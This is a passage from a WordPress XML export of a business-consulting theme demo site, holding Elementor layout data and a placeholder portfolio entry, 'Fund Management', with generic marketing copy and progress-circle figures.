<span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7cdb947d","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7c013b0","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"565ff255","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"43258dcc","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"543ca374","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"6d03bb67","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1423aa98","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"563cea85","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2c0971db","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"65e3e513","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"20ab04","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"1b45061e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1f87b8f2","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"7035b9f7","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"42aca63e","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1d8f3272","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"68704e30","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"2659fd6e","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"78a32404","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"4576f82c","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"3ddc9b40","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Fund Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/</link>
		<pubDate>Fri, 11 Sep 2020 07:02:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=822</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>October 02, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>822</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:02:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:02:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fund-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[823]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4b87d4ec","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"f7bb697","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1a84b099","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1b756974","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"474af26d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"504f8cda","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1a48f134","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8c88c53","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"196761d3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7b262c88","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7a91d778","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"50b0e82d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5a058e3b","elType":"widget","settings":{"editor":"<p>October 02, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"662d291f","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"254317b1","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6d56a150","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"37b90133","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9e89dbb","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"795e26ed","elType":"section","settings":[],"elements":[{"id":"2028e468","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4fa6eed6","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6451e708","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"53c47503","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"26fad19f","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"72246e84","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3e30bab","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"48f095ae","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"67856886","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"69963eef","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"40e2dd7d","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6e855c7e","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"60f37fda","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5be77a3","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"21996c3c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"fbcd01e","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"8a040bb","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2a904ac0","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> 